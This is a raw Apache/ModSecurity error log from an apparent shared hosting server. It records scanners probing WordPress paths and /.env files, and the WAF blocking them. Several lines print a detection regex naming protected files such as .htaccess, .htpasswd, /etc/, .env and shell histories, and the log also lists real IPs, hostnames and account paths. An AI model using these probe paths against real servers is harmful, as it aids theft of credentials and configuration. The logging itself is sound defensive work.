[Tue May 26 16:31:50.563593 2026] [security2:error] [pid 808625:tid 808796] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV9njEl_SBaWibfDmpPogAAACk"]
[Tue May 26 16:31:50.879455 2026] [security2:error] [pid 808625:tid 808775] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahV9njEl_SBaWibfDmpPqQAAABQ"]
[Tue May 26 16:31:51.191681 2026] [security2:error] [pid 808625:tid 808879] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nzEl_SBaWibfDmpPrQAAAHw"]
[Tue May 26 16:31:51.267870 2026] [security2:error] [pid 808625:tid 808870] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9njEl_SBaWibfDmpPqAAAAHM"]
[Tue May 26 16:31:51.495727 2026] [security2:error] [pid 808625:tid 808835] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nzEl_SBaWibfDmpPtAAAAFA"]
[Tue May 26 16:31:51.799301 2026] [security2:error] [pid 808625:tid 808847] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nzEl_SBaWibfDmpPuAAAAFw"]
[Tue May 26 16:31:52.111738 2026] [security2:error] [pid 808625:tid 808812] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV9oDEl_SBaWibfDmpPvAAAADk"]
[Tue May 26 16:31:52.461403 2026] [security2:error] [pid 808625:tid 808770] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahV9oDEl_SBaWibfDmpPwwAAAA8"]
[Tue May 26 16:31:53.198658 2026] [authz_core:error] [pid 808625:tid 808769] [client 176.65.139.237:42702] AH01630: client denied by server configuration: /home2/azurm42s/public_html/buutic/htdocs/.env
[Tue May 26 16:31:53.686161 2026] [security2:error] [pid 808625:tid 808767] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9oTEl_SBaWibfDmpP1QAAAAw"]
[Tue May 26 16:31:54.943411 2026] [security2:error] [pid 808625:tid 808879] [client 89.249.239.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ojEl_SBaWibfDmpP6gAAAHw"]
[Tue May 26 16:31:55.722669 2026] [security2:error] [pid 808625:tid 808789] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ojEl_SBaWibfDmpP9wAAACI"]
[Tue May 26 16:31:56.344800 2026] [security2:error] [pid 808625:tid 808766] [client 66.249.64.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.mosykay.com"] [uri "/index.php"] [unique_id "ahV9ozEl_SBaWibfDmpQAwAAAAs"]
[Tue May 26 16:31:57.382454 2026] [security2:error] [pid 808625:tid 808822] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9pDEl_SBaWibfDmpQEwAAAEM"]
[Tue May 26 16:31:58.065671 2026] [security2:error] [pid 808625:tid 808742] [remote 198.38.81.14:59326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahV9pTEl_SBaWibfDmpQIwAAP3Q"]
[Tue May 26 16:31:59.367640 2026] [security2:error] [pid 808625:tid 808743] [remote 173.249.21.166:44406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV9pzEl_SBaWibfDmpQQwAAFXU"]
[Tue May 26 16:31:59.956925 2026] [security2:error] [pid 808625:tid 808843] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9pzEl_SBaWibfDmpQSQAAAFg"]
[Tue May 26 16:32:00.227810 2026] [security2:error] [pid 808625:tid 808744] [remote 74.7.241.15:55454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-about-banner.php"] [unique_id "ahV9qDEl_SBaWibfDmpQWQAAYnY"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:32:01.252959 2026] [security2:error] [pid 808625:tid 808809] [client 69.171.234.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahV9pzEl_SBaWibfDmpQRgAAADY"]
[Tue May 26 16:32:01.524404 2026] [security2:error] [pid 808625:tid 808847] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9qDEl_SBaWibfDmpQagAAAFw"]
[Tue May 26 16:32:03.719189 2026] [security2:error] [pid 808625:tid 808813] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9qzEl_SBaWibfDmpQmQAAADo"]
[Tue May 26 16:32:05.596137 2026] [security2:error] [pid 808625:tid 808785] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9rTEl_SBaWibfDmpQvQAAAB4"]
[Tue May 26 16:32:06.445706 2026] [core:crit] [pid 808625:tid 808863] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:32:07.112672 2026] [security2:error] [pid 808625:tid 808760] [client 74.7.175.175:49154] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.panda-eco.com"] [uri "/robots.txt"] [unique_id "ahV9rzEl_SBaWibfDmpQ6wAAAAU"]
[Tue May 26 16:32:07.348481 2026] [security2:error] [pid 808625:tid 808872] [client 74.7.175.175:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV9rzEl_SBaWibfDmpQ-wAAAHU"], referer: http://www.panda-eco.com/robots.txt
[Tue May 26 16:32:07.349106 2026] [security2:error] [pid 808625:tid 808776] [client 74.7.175.175:49162] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahV9rzEl_SBaWibfDmpQ-QAAABU"], referer: http://www.panda-eco.com/robots.txt
[Tue May 26 16:32:07.541806 2026] [security2:error] [pid 808625:tid 808857] [client 176.65.139.234:49834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "visnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahV9rzEl_SBaWibfDmpRAgAAAGY"]
[Tue May 26 16:32:07.583185 2026] [security2:error] [pid 808625:tid 808842] [client 176.65.139.239:53152] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "soft.ucdc.co.in"] [uri "/.env"] [unique_id "ahV9rzEl_SBaWibfDmpRAwAAAFc"]
[Tue May 26 16:32:07.583564 2026] [security2:error] [pid 808625:tid 808781] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9rzEl_SBaWibfDmpQ7wAAABo"]
[Tue May 26 16:32:07.770297 2026] [security2:error] [pid 808625:tid 808788] [client 176.65.139.236:55894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "surat.ucdc.co.in"] [uri "/.env"] [unique_id "ahV9rzEl_SBaWibfDmpRBQAAACE"]
[Tue May 26 16:32:09.106907 2026] [security2:error] [pid 808625:tid 808762] [client 160.119.76.58:36990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/xmlrpc.php"] [unique_id "ahV9sDEl_SBaWibfDmpRHgAAAAc"]
[Tue May 26 16:32:09.694266 2026] [security2:error] [pid 808625:tid 808820] [client 160.119.76.58:36992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahV9sTEl_SBaWibfDmpRMgAAAEE"]
[Tue May 26 16:32:10.163292 2026] [security2:error] [pid 808625:tid 808874] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9sTEl_SBaWibfDmpRLgAAAHc"]
[Tue May 26 16:32:10.527271 2026] [security2:error] [pid 808625:tid 808865] [client 176.65.139.236:55904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "himmatnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahV9sjEl_SBaWibfDmpRQgAAAG4"]
[Tue May 26 16:32:11.116912 2026] [security2:error] [pid 808625:tid 808772] [client 138.229.103.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9szEl_SBaWibfDmpRUQAAABE"], referer: https://www.anujtradingco.com/
[Tue May 26 16:32:11.335588 2026] [security2:error] [pid 808625:tid 808791] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9sjEl_SBaWibfDmpRSAAAACQ"]
[Tue May 26 16:32:12.390679 2026] [security2:error] [pid 808625:tid 808756] [client 138.229.103.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9tDEl_SBaWibfDmpRZAAAAAE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 16:32:13.849108 2026] [security2:error] [pid 808625:tid 808833] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9tTEl_SBaWibfDmpRfQAAAE4"]
[Tue May 26 16:32:15.534765 2026] [security2:error] [pid 808625:tid 808837] [client 138.229.103.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV9tzEl_SBaWibfDmpRrAAAAFI"], referer: https://anujtradingco.com
[Tue May 26 16:32:15.915014 2026] [security2:error] [pid 808625:tid 808844] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9tzEl_SBaWibfDmpRpgAAAFk"]
[Tue May 26 16:32:16.143996 2026] [security2:error] [pid 808625:tid 808822] [client 178.20.47.39:55678] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.47.39" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1096"] [id "900925"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahV9uDEl_SBaWibfDmpRtgAAAEM"], referer: http://ameritradeng.com/contact.php
[Tue May 26 16:32:17.644308 2026] [security2:error] [pid 808625:tid 808803] [client 60.48.88.63:34536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.88.48.60.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahV9uTEl_SBaWibfDmpR5AAAADA"], referer: http://ameritradeng.com/contact.php
[Tue May 26 16:32:18.005078 2026] [security2:error] [pid 808625:tid 808856] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9uDEl_SBaWibfDmpRyQAAAGU"]
[Tue May 26 16:32:18.805272 2026] [security2:error] [pid 808625:tid 808867] [client 60.48.88.63:34538] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahV9ujEl_SBaWibfDmpR-QAAAHA"], referer: http://ameritradeng.com/contact.php
[Tue May 26 16:32:18.811177 2026] [security2:error] [pid 808625:tid 808806] [client 60.48.88.63:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahV9ujEl_SBaWibfDmpR_AAAADM"], referer: http://ameritradeng.com/contact.php
[Tue May 26 16:32:18.812453 2026] [security2:error] [pid 808625:tid 808867] [client 60.48.88.63:34538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahV9ujEl_SBaWibfDmpR-QAAAHA"], referer: http://ameritradeng.com/contact.php
[Tue May 26 16:32:19.427386 2026] [security2:error] [pid 808625:tid 808690] [remote 3.208.180.187:58998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahV9uzEl_SBaWibfDmpSDQAAEUA"]
[Tue May 26 16:32:19.828048 2026] [security2:error] [pid 808625:tid 808859] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ujEl_SBaWibfDmpSBwAAAGg"]
[Tue May 26 16:32:20.120906 2026] [security2:error] [pid 808625:tid 808687] [remote 74.7.241.58:60586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV9vDEl_SBaWibfDmpSGgAARz0"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:32:20.972874 2026] [security2:error] [pid 808625:tid 808829] [client 114.119.131.206:56009] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV9vDEl_SBaWibfDmpSMAAAAEo"], referer: http://haddingtonwines.com/cart?remove_item=51a472c08e21aef54ed749806e3e6490
[Tue May 26 16:32:21.442228 2026] [security2:error] [pid 808625:tid 808833] [client 178.20.47.39:61988] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.47.39" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1096"] [id "900925"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahV9vTEl_SBaWibfDmpSOQAAAE4"], referer: http://ameritradeng.com/contact.php
[Tue May 26 16:32:22.014735 2026] [security2:error] [pid 808625:tid 808855] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9vTEl_SBaWibfDmpSPwAAAGQ"]
[Tue May 26 16:32:22.410576 2026] [security2:error] [pid 808625:tid 808778] [client 186.182.168.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9vTEl_SBaWibfDmpSRQAAABc"]
[Tue May 26 16:32:24.234213 2026] [security2:error] [pid 808625:tid 808700] [remote 103.11.102.106:46932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahV9wDEl_SBaWibfDmpSfwAAAEo"]
[Tue May 26 16:32:24.899694 2026] [security2:error] [pid 808625:tid 808861] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9vzEl_SBaWibfDmpScwAAAGo"]
[Tue May 26 16:32:28.552676 2026] [security2:error] [pid 808625:tid 808849] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9wzEl_SBaWibfDmpSwwAAAF4"]
[Tue May 26 16:32:29.975984 2026] [security2:error] [pid 808625:tid 808771] [client 84.37.221.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV9wzEl_SBaWibfDmpSxgAAABA"]
[Tue May 26 16:32:30.686556 2026] [security2:error] [pid 808625:tid 808865] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9xTEl_SBaWibfDmpS7AAAAG4"]
[Tue May 26 16:32:32.075769 2026] [security2:error] [pid 808625:tid 808837] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9xjEl_SBaWibfDmpTDAAAAFI"]
[Tue May 26 16:32:32.365728 2026] [security2:error] [pid 808625:tid 808697] [remote 54.36.102.244:52668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV9yDEl_SBaWibfDmpTKAAACkc"]
[Tue May 26 16:32:32.829348 2026] [proxy:error] [pid 808625:tid 808860] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:32.829410 2026] [proxy_http:error] [pid 808625:tid 808860] [client 207.241.173.38:47142] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:32.830017 2026] [proxy:error] [pid 808625:tid 808860] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:32.830050 2026] [proxy_http:error] [pid 808625:tid 808860] [client 207.241.173.38:47142] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:33.738121 2026] [security2:error] [pid 808625:tid 808841] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9yDEl_SBaWibfDmpTNAAAAFY"]
[Tue May 26 16:32:33.909765 2026] [proxy:error] [pid 808625:tid 808825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
